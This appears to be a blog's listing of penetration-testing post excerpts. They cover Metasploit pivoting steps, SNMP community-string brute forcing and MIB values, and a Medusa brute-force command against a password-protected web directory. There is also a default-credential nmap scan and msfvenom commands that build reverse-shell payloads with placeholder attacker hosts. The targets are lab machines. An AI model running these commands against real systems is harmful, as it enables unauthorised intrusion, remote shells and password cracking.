Exploiting Software Based Vulnerabilities : Attacking Network - Pentesting Network

Exploiting Software Based Vulnerabilities : Attacking Network - Pentesting Network 

Vulnerabilities exist on a particular machine can be software and hardware based. Today we will see how we can Exploit Software Based Vulnerabilities to take over target machine.

Software based vulnerabilities are nothing, but just a coding/programming error exist in a Particular software version or series. Which can be hacked/compromise using a group of malicious code called as an "Exploit".

First we have identified a SMTP service on our target machine 192.168.131.137

SLmail smtpd 5.5.0 4433 is running in port 25 

Metasploit Pivoting And Port Forwarding : Attacking Network - Pentesting Network

Metasploit Pivoting And Port Forwarding : Attacking Network - Pentesting Network 

Metasploit pivot technique helps an attacker to Compromise the other Machines which attacker don`t have access to.

So the scenario would be like below.

Attacker: 192.168.23.X

Attacker Can Communicate With System A: 192.168.31.X

A System Can Only Communicate With B System : 10.1.1.X

Attacker Wants To Communicate With Other Systems Using System B.
We also consider that, attacker dont have idea about the System C IP Address.

Pivoting can be achieved in below steps.

Pivoting can be perform in following steps:

1. Compromise primary target machine (System A)
2. Search for System network interfaces.
3. Add route to metasploit session of System A.
4. Run Proxy server
5. Scan the Second target machine (System B)
6. Port forwarding
7. Perform Exploit

Hacking SNMP Service Part 2 - The Post Exploitation : Attacking Network - Network Pentesting

Hacking SNMP Service Part 2 - The Post Exploitation : Attacking Network - Network Pentesting

From our previous post, We have identified the community strings Via Nmap Scan & Brute Forcing the Community String Values.

Now we will see, How can we use those Extracted Community strings for Post Exploitation.

To perform We will use various tools as mention below.

What Is MIB in SNMP

The SNMP Management Information Base (MIB) is a database containing information

usually related to network management. The database is organized like a tree, where

branches represent different organizations or network functions. The leaves of the tree

(final endpoints) correspond to specific variable values that can then be accessed, and

probed, by an external user. To read more about the MIB tree, refer to the following

http://publib.boulder.ibm.com/infocenter/pseries/v5r3/index.jsp?topic=/com.ibm.

aix.progcomm/doc/progcomc/mib.htm

For example, the following MIB values correspond to specific Microsoft Windows

SNMP parameters.

1.3.6.1.2.1.25.1.6.0        System Processes

1.3.6.1.2.1.25.4.2.1.2     Running Programs

1.3.6.1.2.1.25.4.2.1.4     Processes Path

1.3.6.1.2.1.25.2.3.1.4     Storage Units

1.3.6.1.2.1.25.6.3.1.2     Software Name

1.3.6.1.4.1.77.1.2.25      User Accounts

1.3.6.1.2.1.6.13.1.3        TCP LocalPorts

Hacking SNMP Service Part 1 - The Post Exploitation : Attacking Network - Network Pentesting

Hacking SNMP Service Part 1 - The Post Exploitation : Attacking Network - Network Pentesting

SNMP (Simple Network Management Protocol)

Simple Network Management Protocol (SNMP) is a popular protocol for network management. It is used for collecting information from, and configuring, network devices, such as servers, printers, hubs, switches, and routers on an Internet Protocol (IP) network.

With lots of usability, SNMP can be used by an attacker to compromise the services and IT infrastructure as well. which will cover later.

Now we will see how we can brute force the SNMP Services Community Strings.

But Why Crack SNMP Community Strings

The SNMP Read-Only Community String is like a user id or password. It is sent along with each SNMP Get-Request and allows (or denies) access to a router's or other device's statistics. If the community string is correct, the device responds with the requested information. If the community string is incorrect, the device simply ignores the request and does not respond.

What We Can Do By Community Strings.

Default community strings are "public" & "private" with "ro" (Read Only) & "rw" (Read & Write).

As it clear indicates, that Read only means user can only read the information & Read and Write means user can write/update the information present in SNMP.

Cracking SSH FTP HTTP FTP : Attacking Network - Network Pentesting

Cracking SSH FTP HTTP FTP : Attacking Network - Network Pentesting

Apart from using Default Credentials, we can also perform a brute force attack on various services to get into them.

1) HTTP (htaccess protected web directory) 

Medusa comes in rescue when we talk about Basic Authorization or Password Protected Web Directory Cracking

Medusa commmand line to For Cracking Basic Authorization or Password Protected Web Directory

 medusa -h 192.168.11.219 -u admin -P Desktop/demo/password -M http -m DIR:/secret-T 10

Medusa will go ahead and try Crack Password Protected Web Directory by using user as admin and password as provide in password list on Password Protected Web Directory secret. 

Default Credentials Vulnerability : Attacking Network - Network Pentesting

Default Credentials Vulnerability : Attacking Network - Network Pentesting

Hello reader, We have talked lots of about Web Hacking & today i decided to blog some intresting things about Attacking Network - Network Pentesting.

For your information, for demonstration purpose i am using Vyatta VM, which you can also download from http://packages.vyos.net/iso/release/1.1.7/ 

Today we will see the common vulnerability which most of admin do, by keeping default configuration or you can also say keeping default credentials.

So we have a Target machine on 192.168.131.135 & our Attacking Machine on 192.168.131.134

Lets do a Nmap Service Scan on our target machine.

nmap -sV 192.168.131.135 

So we got some information like port 22, 23, 80 & 443.

Apart from all port, 22 & 23 looks interesting for us and it might possible that credentials would be default for that service. 

Generating Metasploit Payloads : Creating Metasploit Reverse Shell

Generating Metasploit Payloads : Creating Metasploit Reverse Shell

Below is the different type of Metasploit Payloads we can use while to get the reverse shell of victim machine.

These exploit can be used in metasploit by using set payload "payloadnae" and before it we have to set multi handler which can be configured by use exploit/multi/handler

Mention payloads require certain inputs as an option such as LHOST, LPORT.

Operating System Based Bionaries Shell

Linux

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=attackerip LPORT=attackerport -elf > shell.elf

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=attackerip LPORT=attackerport -f exe > shell.exe

Mac

msfvenom -p osx/x86/shell_reverse_tcp LHOST=attackerip LPORT=attackerport -f macho > shell.macho

Web Payloads : Usually For RFI, SQL Injection